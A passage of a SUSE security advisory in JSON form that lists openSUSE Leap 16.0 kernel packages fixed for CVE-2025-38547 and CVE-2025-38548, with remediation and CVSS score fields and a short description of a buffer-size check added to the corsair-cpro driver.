"summary": "SUSE Bug 1248222 for CVE-2025-38547",
"url": "https://bugzilla.suse.com/1248222"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "low"
}
],
"title": "CVE-2025-38547"
},
{
"cve": "CVE-2025-38548",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38548"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (corsair-cpro) Validate the size of the received input buffer\n\nAdd buffer_recv_size to store the size of the received bytes.\nValidate buffer_recv_size in send_usb_cmd().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
